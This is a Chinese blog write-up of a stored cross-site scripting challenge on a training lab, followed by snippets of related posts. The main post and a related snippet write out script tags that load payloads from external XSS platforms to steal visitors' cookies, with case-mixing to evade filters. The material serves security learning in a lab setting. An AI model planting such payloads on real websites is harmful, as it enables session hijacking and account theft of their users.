封神台靶场存储型XSS WirteUP

于 2024-09-27 12:32:11 发布
阅读量358 收藏 2
点赞数 19
文章标签: xss 网络 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jijhvuu/article/details/142590422
版权

存储型 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞。
一、概念
存储型 XSS 是指攻击者将恶意脚本提交到目标网站的数据库中,当其他用户访问包含该恶意脚本的页面时,浏览器会执行这些恶意脚本。
二、攻击过程
攻击者寻找目标网站的漏洞,通常是输入表单、评论区等可以接受用户输入的地方。
攻击者构造包含恶意脚本的输入内容,并提交到目标网站。
目标网站将恶意脚本存储到数据库中。
其他用户访问包含恶意脚本的页面时,服务器从数据库中取出恶意脚本并发送给用户的浏览器。
用户的浏览器执行恶意脚本,可能导致用户的敏感信息被窃取、账户被劫持等后果。

常见场景为留言板 账号注册 等

封神台存储型xss演示 利用

首先看到留言板页面 联想到可能有存储型xss

尝试注入js代码使其弹窗:

成功弹出1的警告框 判断有xss漏洞

打开在线xss平台

配置代码 <sCRiPt sRC=//xs.pe/iK4></sCrIpT>  //从script加载xss平台的payload

点击提交

后台提示有主机上线 查看后台

成功获取到cookie  但是没看到flag

我查看了一下官方wp flag包含在cookie栏中 评论区也有反应没看到的 应该是环境问题

总之不行就多换几个xss平台

wh0am1_root
关注
神台存储Xss靶场
qq_40941912的博客
10-05 654
作业 存储Xss靶场 (Rank: 10) 靶场上面是个finecms,然后在网上搜索了一下它所存在的漏洞,发现在404界面会将地址栏的get传参输入到日志里面,存储到数据库,将参数值替换成我们构造好的payload,当管理员产看日志的时候会触发payload,存在一个存储xss 于是找到传参点: 在xss平台建立一个项目,得到构造好的payload: 当作m的参数传进去: 拿到cookie: 成功拿到flag{zKaQ-01sdfDCo0} 提交flag,成功
xss获取cookie(神台第三章)
qq_66013948的博客
09-20 437
之后,在xss.pt网站中注册一个账号,生成一个xss代码用po......的方式(非p时效短),然后将代码放在有xss漏洞的地方,上传表单。之前说过cookie就是在访问网站的时候第一个传递的数据,这其实是不全面的,cookie真正的指的其实就是某些网站为了辨别用户身份,进行session追踪而存储在用户本地终端上的数据,一般经过加密。首先应该看一下将能够输入内容的地方全部写上,然后观察后面的反馈,之后寻找xss注入点,可以按F12审查元素,寻找可执行的xss语句。
神台靶场-第四章
Mr_helloword的博客
07-12 1488
第四章:为了更多的权限! Tips: 1、存储Xss 2、flag在cookie里,格式为zkz{…},xss bot 每10秒访问一次页面 3、自建Xss平台源码:http://www.zkaq.org/?t/99.html 登陆后根据提示要进行存储xss注入。 这里我们可以借助一个xss平台xss平台没有的可以在这里注册 创建项目 2.选择模块我这里选择自己想要的模块 3.复制如下代码到可能存在注入的地方 4.随便填入留言板提交 5.回到xss平台发现收到xss注入反馈 fl
xss靶场原理以及绕过方法
weixin_75055385的博客
06-29 544
xss攻击的一些基本原理以及一些绕过方法,有错的地方的话,希望各位师傅们指出来,谢谢
mbp 神台靶场 四 (笔记)
qq_43558415的博客
02-09 626
打开链接,发现是个留言板,尝试xss注入,看看是否可行。 弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。 将此代码段植入刚才的区域中<script src=http://xsspt.com/2gVqle></script>然后查看项目内容发现flag 总结:本关主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入...
ctf实战 神台靶场 第四关通关记录
weixin_30437847的博客
05-28 1196
发现留言板功能,顺手试下反射xss代码,结果成功的弹窗了 网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。 我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个 然后你可以看到一叠代码,这个就是两个模块中的XSS Payload。把生成的存储xss链接放入留言板提交成功后到xss平台等查...
XSS漏洞注入及靶场演示
Zeker62的博客
07-28 719
其实SQL注入还没学透,XSS漏洞又开始紧锣密鼓得学起来了。 无奈自学没人指导,看别人写的东西进行一个总结. 这个暑假总要搞掉一些东西 XSS漏洞概述 XSS漏洞——OWASP TOP3 XSS中文名叫跨站脚本攻击,就是在Web页面中在可传入的地方传入一些恶意代码,而并未做到过滤,在用户浏览网页的时候,这些代码被执行,导致用户资料被窃取或者其他事情。 XSS漏洞有三种类: 反射:只对本次访问页面有效 存储存储到web的数据库中 DOM:还没接触 例如,在如下代码中 <h1>&l.
神台-尤里的复仇Ⅰ
weixin_44522540的博客
02-20 863
神台-尤里的复仇Ⅰ 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录神台-尤里的复仇Ⅰ前言一、为了女神小芳二、1.引入库2.读入数据三、四、为了更多的权限!留言板!五、六、七、八、九、总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳 一二三四五六章
m0_52051132的博客
03-26 4316
神台 掌控安全靶场 尤里的复仇 Ⅰ 小芳 一二三四五六章 文章目录神台 掌控安全靶场 尤里的复仇 Ⅰ 小芳 一二三四五六章第一章:为了女神小芳 SQL注入攻击原理实战演练第二章:遇到阻难 绕过WAF过虑 SQL注入攻击原理实战演练第三章:为了更多的权限 留言板 cookie伪造目标权限 实战演练第四章:进击 拿到Web最高权限 绕过防护上传木马实战演练第五章:SYSTEM POWER webshell控制目标 实战演练 第一章:为了女神小芳 SQL注入攻击原理实战演练 第一步,判断是否存在sql注
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
YXcms-含有存储XSS漏洞的源码包
03-17
存储XSSXSS攻击的一种类,这种漏洞通常发生在用户提交的数据被持久化存储在服务器上,并在后续请求中未经适当过滤或转义就被显示出来,从而允许攻击者植入恶意脚本。 【描述解析】 描述中的"亲测真实有效可用...
DedeCMS 存储xss漏洞1
08-03
【DedeCMS 存储 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
脚本注入网页:XSS
最新发布
m0_73902453的博客
09-23 604
我前面讲的是要将一段JavaScript代码注入到网页中,如果我们将代码执行上去,需要将信息弹出来,这里我们用代码如下,发现果然弹窗了,也就是说,如果我们能找到一个存在漏洞的输入框,并且将类似的执行代码放到输入框中,就能达到某些目的。我们再通过get请求,给到一个JavaScript的伪协议 ,发现网站确实执行了这段代码,假如加入的是一段恶意代码,那当用户点击的时候就会达到攻击的目的。主要就是我们给它一个url,它会给到一个指向自己的超链接,例如我们输入下列代码,就发现它形成了一个指向baidu的超链接。
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储 XSS)
YueXuan_521的博客
09-19 1020
网络安全 DVWA通关指南 DVWA Stored Cross Site Scripting (存储 XSS)
网络安全】Drupal之缓存中毒+储存XSS
等风来
09-23 355
缓存系统通常会基于唯一键(如URL和查询参数的组合)来区分不同的请求和响应。即使你请求的是相同的资源,如果URL中的参数不同,服务器可能会为不同的参数创建不同的缓存条目。例如,GET /page?param=123和GET /page?param=456会被视为不同的请求。
计算机网络笔记001
cocofu的博客
09-22 755
通信网络研究的是通信终端(如电话)和内部通信问题,而计算机网络则更关注计算机之间的联网和通信,比如我们的Wi-Fi网络。分布式系统是一种建立在计算机网络之上的、 具有高度内聚性 ( Cohesiveness ) 和透明性 ( Transparency ) 的系统, 呈现给用户的是一 个统一的系统, 好像是一台计算机 。#### 学生D:云计算平台也是,像AWS,不同的服务如存储、计算和数据库虽然独立,但通过一个统一的管理界面和API协作,用户感觉是一个整体。#### 老师:没错,这是一部分。
kubernetes网络(一)之calico详解
鲜少伟的博客
09-22 1148
本文介绍Kubernetes最流行的网络解决方案calico。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值